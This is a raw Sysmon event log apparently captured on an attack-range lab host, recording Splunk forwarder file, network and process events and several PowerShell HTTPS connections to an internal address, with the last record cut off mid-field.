18:08:54.127{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F19036C851D0320E5BDE8C55CBBA5359,SHA256=4473CEB5AD8439996D50542CA8404685635D2EE3EC975CC6D2DFA05FF398E1E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:55.145{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E00847F597A44CAAFA5701909639095,SHA256=4BF45648D8FAE3B4FD9F3B3212072199C6C5773B1CF81EC6069C0982EFAB1084,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:21.076{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56563-false10.0.1.12-8000- 354300x800000000000000035084103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:20.792{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56562-false10.0.1.12-8089- 23542300x800000000000000035084102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:56.159{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97C7540E866ADA54A7D1031B08AE41D3,SHA256=121B2A6EECB055BA473B0FEAFB529A591A4C36D97660BC15BD21EE5FD76DF39C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:57.659{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0E420204E3CD6F1C6FCFC9E798E2FFBA,SHA256=44AF43B075D38C63DAB96715AEF1DD42F6D5D16C053184464AF2777AF1D9E17D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:57.174{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5ED79277DBD3D24D31B89B26B4A6BAE,SHA256=B0A008C9E45724113083FDA3EB70BAFC33A903284A4A265E62CBB9341EFC4515,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:22.675{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56564-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:58.174{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06341576C3B4870C341D93ACCD88114A,SHA256=052C63A094C80BDAA2B71D720422B748F699B79AE91E51E326E1B592AE43EB97,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:59.205{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E98C2FA71FBE81343EAE80B82EE8528D,SHA256=7B55A66D3C318A8C7C2ADE8EC839AE4D6BE575FB6E1C2ED0D0A38AF3A1390E2B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:00.223{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2D6F1E3C09685A4643C415FB66C5B9A,SHA256=99561488D8448FA40BA3CD859FDDA193647E68B75378CC87FAAAED94807D79EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:26.185{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56565-false10.0.1.12-8000- 23542300x800000000000000035084112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:01.724{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EFD7098163A4C7DCCD3647D75CF1B330,SHA256=EC7ECA4D144E09FF7C0723B9214B407DEE7E3D0F571062877097248CAB3C7056,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:01.226{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD0E938A4BBC61033D507567DB41E607,SHA256=3FA6DC771DFFEA6C2AFA6FD1C5CD8BE2B3411760016004CADE0011E38665FA00,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:26.690{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56566-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:02.257{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C0C626FCC1331433F1B7E863236A4C7,SHA256=A450ADAF639AA97146B8F0F8FB9D6B8E49F8D62FA9C6BE50F4E72D0F843E4689,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:03.304{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0C71F0DE581FEA03FB82B0BD51EA5A0,SHA256=B76AA8DEAABDBA2AF26F328C3D5D381BB35913FACF2174830B26B46D353D63E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:04.320{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A38ADB7B7033B0C61DCB2C7C951F6C5,SHA256=A66229D721BB66BFF963E2C0E2928B5DC1BE0BD40D6656CB8FEBFD2302DB19D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:05.339{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F25535EF823048A39F673D70B679788,SHA256=8D259B4B70B214624FD4AD87B9CA4740F96DA69BBB2CCDB794998608F317BE93,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:31.255{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56567-false10.0.1.12-8000- 23542300x800000000000000035084120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:06.921{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6B56F08B79DF262DD26CD0A008161B6B,SHA256=CEBDDD66EFF125873829BEC0F74A209EF3B2DFB757B307FB58E8C4E898DC1872,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:06.370{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C2CD7D6C9A857F8354EF13DDEA61DE3,SHA256=D9D333085C96464D7B87973D6D194E82035C2813839C63AA4B016D1DAEB49C0D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:31.702{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56568-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:07.385{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DA2CFEC9049815B60CE1135FDBDCDDD,SHA256=30910C2FC3AB7A82A0AEB6E92CE96722E271956AD3227E71342C30F250D1087D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:08.418{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=766135B14EF05F5E5DEFEF8DA8C12848,SHA256=C86BD841AB360B3E42BE0D9DEB6FC7B7DDAE50063528754150BE62B7ED971B42,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:09.452{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=586651B06F6A4CE137E4B144BDD6E859,SHA256=33B32F2AD307ACFE8E867BAD979337D6FD52439D1754F4BEB47406C458C021ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:10.935{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C7AD29EC3B52D5E1AE2AB8D79135B868,SHA256=722684645162821078895C9AB7D983FFF07C0439FFDEE1BDB3930641AA9787D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:10.482{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A3E9C2A1D6332FDFC0E1FDCDFA543F1,SHA256=919EC0FFF3C90A29A9C8660F9092507AC9C2E3539C5725EE59CB65D394AEE485,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:11.515{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E12A0F54D395A5DCE8B1C72689DDBE,SHA256=A84FB770BD9E70F08D6F3314DE351DBFA1E4EB7B326A22274AE0DE1DE13FE934,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:35.715{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56569-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:12.551{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21FE4D3B5DF942D88BD6EBB6ED3D099E,SHA256=58D4063F900EA668E6B81BEB0662806F40E89C80D0F47CB87492879C24E36729,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:13.597{B81B27B7-4DC9-613A-2E90-03000000C801}68085368C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:13.581{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCC1EE299E2D5293C6AFB46C3734584F,SHA256=2B35970AAAEF233F5C8C0EEE7C34F3E473B562432555FE818421B91A862F8C16,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:13.417{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DC9-613A-2E90-03000000C801}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:13.415{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:13.415{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:13.415{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:13.414{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:13.414{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4DC9-613A-2E90-03000000C801}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:13.414{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DC9-613A-2E90-03000000C801}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:13.398{B81B27B7-4DC9-613A-2E90-03000000C801}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035084131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:37.051{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56570-false10.0.1.12-8000- 23542300x800000000000000035084153Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:14.818{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=32C5399A17CB17F012320E050D419C67,SHA256=0BBEDF2BA420879A49260A32ED185C6F7A3C4C5201794A8053DED72D862A21FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084152Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:14.619{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C06DDBEE5A4D8FC1998F34FDE6C75220,SHA256=AF53D9D55F6D092FDF1734B40846FCE1E47CC772B97168F9F70E41AA01918093,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084151Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:14.619{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D151627739580FD3AA249ABFE01D6504,SHA256=94E66F0CE5E6FE64890E3F201DD3FAC05AE85E533F793C2FCA88EFAE1A34EFB8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084150Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:14.617{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 